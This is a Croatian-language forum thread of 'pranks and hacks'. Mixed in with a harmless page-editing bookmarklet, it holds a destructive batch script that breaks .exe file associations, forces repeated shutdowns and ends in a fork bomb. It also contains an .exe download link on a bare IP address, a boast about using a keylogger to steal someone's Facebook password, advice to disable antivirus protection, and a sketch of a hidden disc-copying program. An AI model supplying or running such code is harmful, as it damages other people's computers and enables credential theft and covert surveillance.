Bila je neka skripta za uređivanje teksta u browseru, unesem ju u ovaj gore search bar kako se već zove i mogu editati, ako se netko sjeća ili ju zna puno bi mi pomogla :)
Vaši prankovi (šale) i hackovi
- poruka: 1.070
- |
- čitano: 259.210
- |
- moderatori:
DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
Bila je neka skripta za uređivanje teksta u browseru, unesem ju u ovaj gore search bar kako se već zove i mogu editati, ako se netko sjeća ili ju zna puno bi mi pomogla :)
javascript:javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
molim kod koji stalno otvara cmd
Ljudi kako napraviti u batch-u komandu da salje da se moja ladica od kase otvara(za trgovinu je) jel moze ikako objasniti il' napravuiti tu konmandu i kako ukljuciti kasu uopce u komp..??
Pozzz :)))
Zna li ko kod koji stalnootvara error gdje pise nesto ko onako daj pet kuna sutra ili ce ti crknit komp noobe.. i slicno
Bilo dosadno pa evo nes bzvz xD http://205.196.122.17/t1ykuk65apeg/32xrfl53sqis139/Hipi+Button.exe
Moja "šala" je da pošaljem nekoj swatkoj mawoj l00dachi keylogger i uzmem joj šifru od FB-a i ona glupa nezna reset pw...
evo jedan prank
:a
set i=1
i=i+1
cd %ProgramFiles%
assoc *.exe=txtfile
shutdown -s -t 50
start
if i => 10 then
goto b
end if
goto a
:b
set h=%random%
cd %homedrive%
md %h%
echo shutdown -s -t 20 -c "hahahahaha">>%homedrive%\%h%\a.cmd
start %homedrive%\%h%\a.cmd>>%homedrive%\%h%\a.cmd
%0|%0
goto a
ne znam da li radi.
koristiti na vlastitu odgovornost
dali mi moze neko poslati java skriptu za mjenjanje teksta na stranici. treba mi kao prank da uvalim prijatelju :P. znam da sam prije to koristio na mozili a sad ga nemogu nac. hvala!
EDIT: Nasao sam
start
goto a
ili
start a.cmd
ovo drugo moras napraviti kao a. cmd
zna li neko skriptu koja stalno pali/gasi caps lock
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
do
wscript.sleep 100
loop
spremia san ga kao .vbs ali mi je avast pronasao virus
do
wscript.sleep 100
loop
spremia san ga kao .vbs ali mi je avast pronasao virus
Isključi real time zaštitu...
Znam da je tema vec dosta stara ali, Da li bi se mogao napraviti program koji bi radio u pozadini windowsa i koji bi automatski kopirao sve cd/ dvd medije koji se stave u pc ali u backroundu da se ništa ne posumnja. Hvala!
Znam da je tema vec dosta stara ali, Da li bi se mogao napraviti program koji bi radio u pozadini windowsa i koji bi automatski kopirao sve cd/ dvd medije koji se stave u pc ali u backroundu da se ništa ne posumlja. Hvala!
SUMNJA SUMNJA SUMNJA. NJ LJ
I ne, ne može se bez da netko ne posumnja.
Znam da je tema vec dosta stara ali, Da li bi se mogao napraviti program koji bi radio u pozadini windowsa i koji bi automatski kopirao sve cd/ dvd medije koji se stave u pc ali u backroundu da se ništa ne posumnja. Hvala!
Pa moglo bi se, ali pitanje je da li pi program stigao sve kopirati prije nego što se cd/dvd izvadi, a i stvaralo bi se puno buke zbog okretanja medija dok se kopira tako da bi se vjerojatno posumnjalo odmah da nešto nije u redu.
Pa moglo bi se, ali pitanje je da li pi program stigao sve kopirati prije nego što se cd/dvd izvadi, a i stvaralo bi se puno buke zbog okretanja medija dok se kopira tako da bi se vjerojatno posumnjalo odmah da nešto nije u redu.
Buka nije problem samo da nema nikakvod loading screena ili nekih obavijesti.
c++/BASIC... bilo koji programski jezik. Rekurzivna funkcija za izlistavanje direktorija i kopiranje fajlova... program pokrenut u pozadini, treba detektirati kad je cd/dvd stavljen i onda počne sa radom. Čak nije ni teško napraviti.